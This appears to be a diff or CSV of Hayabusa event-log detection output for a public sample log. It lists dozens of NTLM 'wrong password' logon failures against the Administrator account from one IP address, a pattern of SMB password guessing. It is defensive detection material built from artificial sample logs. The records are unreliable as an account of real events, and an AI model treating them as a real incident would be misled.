+2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mzzw3uPkn2cgtmlF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aPnfUjwJei5E5BD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mm1k0eeKAYokIbDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w8TDNcJ3LMyNtUe1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogKKslkdXvc9f130 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgoy6gMfe5N0UiP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfjf3d6I8TsBOzvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vs8DG8s81oOwYoI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LFkgN1aDoYkQ4qrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KMwLokYpcFIYHegd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oKradBV4ERsQnKs | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qPzlzfmgrbYTKqQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKYlBm2lhobHzbjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBMu96oqO9tb3f4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO04Q3eYdzyuy51v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FrIa2UrSrfdhkDCx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: axhhyMrGl95O16Vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atjvfi8QeEDluhL2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HPBZKUiiKeyQwSr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2SmitfyjO4mxqw5E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nrq1g8ktTQbPTXqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 943GV3t1muba5IQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPVd28zf85AxdGqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D6evoSSxcKkHspuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C4fznmrnIdUH7DzG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwrrYjUV41P0K5Jh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4RBZrALEnH5BKP9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LU6uWH4gs4iHP7rV | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCfhZDAH8ufk77zN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TE9pw4UeRldGeKVc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8PKE05MqxE5TwXT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GIE5fmddOPBbCM3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pveyo4Czx6KWKCGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: zPyyHaRnBec7Qg2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3b8mudJp5mdkiEW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Y6mjLaCzR28Q2qK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dMsNKWEjeCYYQVqw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7c5fENhkwO6QfEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cr1wAeMhPgVpwV82 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErpp9Ww6LO37C9k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYsNpBsGT5zOKe3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgzUk1Dmttm4AQ3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hp0c3YYyOSJuBHCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gkis4H1MIQPHUwqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lb6mH03qKLb8O7Dz | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J10xEmhRNWfJ5FCI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Dujj8A7wwzAwzCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVDE3fIoUQfLn3cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UlD48O0XpFUnuSmo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KyTPKuspADmLpv0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: BdIAPiH32ZbmCgTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dEiN2xOA4E9Wl5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBeAez2fLjXB0dk3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gQ45aeMDc3Snabvv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWSYdr4lJlhCLMMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgxHY7072aUCdfa0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9yKhEodJDTVCGdIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z0odyPQmvkGRNWZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b5uRpG0fxCK75DPV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d9dcEzpJRW5YA8Bj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv3B9bwB1YIaBa6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJf9Obml4aVxE5zp | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mvnSOaRSkGU6Uf5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JSAkZsZsv0SaLKaO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6rnM6QbwfbbrcGy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RX0GW7K5wdQJUx4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xm7CpD5i735McsvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: bHxjZsnR25J47Ez8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1JWj91m79FyykH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h9i0GncOzpz5REWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BODZRJ6G3xxw29VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ2lq4piINfmI7Qe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NqDeXdOitJ3WY8w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
